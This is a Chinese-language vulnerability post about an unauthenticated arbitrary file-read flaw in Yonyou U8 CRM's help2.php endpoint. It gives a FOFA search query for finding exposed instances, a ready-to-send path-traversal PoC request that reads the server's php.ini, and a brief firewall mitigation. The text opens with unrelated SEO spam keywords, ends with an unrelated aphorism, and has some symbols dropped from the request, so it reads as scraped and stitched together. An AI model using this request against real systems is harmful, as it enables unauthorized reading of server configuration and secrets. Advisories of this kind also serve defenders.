北京网站优化快速排名,苏州h5网站,盱眙网站建设公司,手机黄山网站文章目录 产品简介漏洞概述指纹识别漏洞利用修复建议 产品简介
用友CRM#xff08;Customer Relationship Management#xff0c;客户关系管理#xff09;是由用友公司开发的一款软件#xff0c;专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管… 文章目录 产品简介漏洞概述指纹识别漏洞利用修复建议 产品简介
用友CRMCustomer Relationship Management客户关系管理是由用友公司开发的一款软件专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系提升客户满意度优化销售和服务流程从而提高企业的市场竞争力。它适用于各种规模的企业可以根据不同企业的具体需求进行定制和扩展。
漏洞概述
用友CRM系统在help2.php接口处存在任意文件读取漏洞未授权的攻击者可以通过此漏洞读取服务器上的敏感文件
指纹识别
fofa:
title用友U8CRM漏洞利用
poc
GET /pub/help2.php?key/../../apache/php.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate读取php配置文件
修复建议
临时缓解措施在防火墙上设置访问策略不允许任何人访问该路径
【天底下喜欢讲道理的人大致可以分为两种一种是为了让自己心里好受一种是希望让世道好过。】